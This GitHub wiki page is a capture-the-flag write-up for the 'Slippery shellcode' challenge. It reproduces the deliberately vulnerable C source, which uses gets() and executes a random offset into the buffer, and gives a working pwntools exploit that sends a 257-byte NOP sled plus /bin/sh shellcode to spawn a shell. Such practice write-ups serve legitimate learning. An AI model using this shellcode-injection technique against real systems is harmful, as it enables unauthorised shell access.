-
Notifications
You must be signed in to change notification settings - Fork 1
Slippery shellcode
cheaterdxd edited this page Oct 13, 2019
·
1 revision
This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0 on the shell server. Source.
No hint
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 512
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing from a random location now...");
int offset = (rand() % 256) + 1;
((void (*)())(buf+offset))();
puts("Finishing Executing Shellcode. Exiting now...");
return 0;
}
we know we must find a way to bypass the offset. You know that offset = rand( ) % 256 + 1, its mean, offset always smaller 257, so if we spawn 256 nop intructions + shellcode. it's always jump to nop. Then excute the shellcode.
from pwn import *
s = process('./vuln')
shellcode = asm(shellcraft.i386.linux.sh())
payload = '\x90'*257+shellcode
s.sendline(payload)
s.interactive()